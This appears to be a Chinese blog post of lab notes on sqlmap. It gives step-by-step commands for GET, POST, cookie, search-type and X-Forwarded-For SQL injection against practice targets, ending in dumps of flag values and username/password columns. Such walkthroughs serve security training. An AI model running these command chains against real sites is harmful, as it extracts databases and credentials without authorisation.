Sqlmap

2023-04-13 10:45:49

Sqlmap

1、Sqlmap对get请求数字型、字符型注入## 标题

2、sqlmap对Get请求注入

对http://www.whalwl.host:8001/bug/sql_injection/sql_num.php进行get注入

命令

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” --dbs

Sqlmap

查询dwvs库表名

命令：

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs --tables

Sqlmap

查dwvs库中flag表的字段名

命令：

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs -T flag --columns

Sqlmap

显示flag表中flag字段

命令：

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs -T flag -C flag --dump

Sqlmap

Sqlmap对post请求注入

首先用burp进行抓包

Sqlmap

将报文复制粘贴在1.txt 将1.txt放入

Sqlmap

命令：

python sqlmap.py -r 1.txt

Sqlmap

查库

命令：

python sqlmap.py -r 1.txt --dbs

Sqlmap

查test库中表名

命令：

python sqlmap.py -r 1.txt -D test --tables

Sqlmap

查wan表中字段

命令：

Python sqlmap.py -r 1.txt -D test -T wan --columns

Sqlmap

显示字段

命令：

Python sqlmap.py -r 1.txt -D test -T wan -C username,password --dump

Sqlmap

2、对此网站进行sqlmap cookie注入

http://www.whalwl.host:8009/user.php?id=1

命令：

Python sqlmap.py -u “http://www.whalwl.host:8009/user.php?” --cookie “id=1” --level 2 --tables

Sqlmap

查this_flag字段

命令：

python sqlmap.py -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1"  --level 2 -T this_flag --columns

Sqlmap

查看flag值

命令：

python sqlmap.py -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1"  --level 2 -T this_flag -C flag --dump

Sqlmap

3、Sqlmap搜索型注入

http://www.whalwl.host:8002/search.php

查数据库

命令：

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" --dbs

Sqlmap

查dwvs库表名

命令：

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs --tables

Sqlmap

查flag字段

命令:

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs -T flag --columns

Sqlmap

flag值

命令：

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs -T flag -C flag --dump

Sqlmap

4、X-Forwarded-For注入手工注入和sqlmap注入

1、Sqlmap注入

Burp抓包

并添加

X-Forwarded-for: 8.8.8.8*

Sqlmap

复制粘贴至1.TXT

Sqlmap

命令：

python sqlmap.py -r 1.txt --dbs

Sqlmap

命令：

python sqlmap.py -r 1.txt -D xff --tables

Sqlmap

命令：

python sqlmap.py -r 1.txt -D xff -T this_flag --columns

Sqlmap

命令：

python sqlmap.py -r 1.txt -D xff -T this_flag -C flag --dump

Sqlmap

2、手工注入

链接：

https://blog.csdn.net/mutou990/article/details/107761999

Sqlmap

Sqlmap

Sqlmap对post请求注入

2、对此网站进行sqlmap cookie注入

3、Sqlmap搜索型注入

2、手工注入

继续阅读

SQLMAP 使用笔记

SQLMAP入门

渗透测试工具之sqlmap注入神器

使用burp suite日志进行sqlmap注入

最新版BurpSuite和支持Python3的sqlmap

【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES

Sqlmap远程连接Mysql，报错（2003）

sqlmap 绕过防火墙的tamper脚本大全0x01 start

sqlmap绕过防火墙

Kali Linux工具集简介 -sqlmap

iwebsec靶场 SQL注入漏洞通关笔记3- bool注入（布尔型盲注）系列文章目录前言一、源码分析二、sqlmap渗透总结

iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入前言第01关数字型注入总结

sqlmap检测SQL注入及解决方案（Django）--超详细

SQLMAP自动注入（二）-REQUEST

记录在学习SQL注入的过程中遇到的几个坑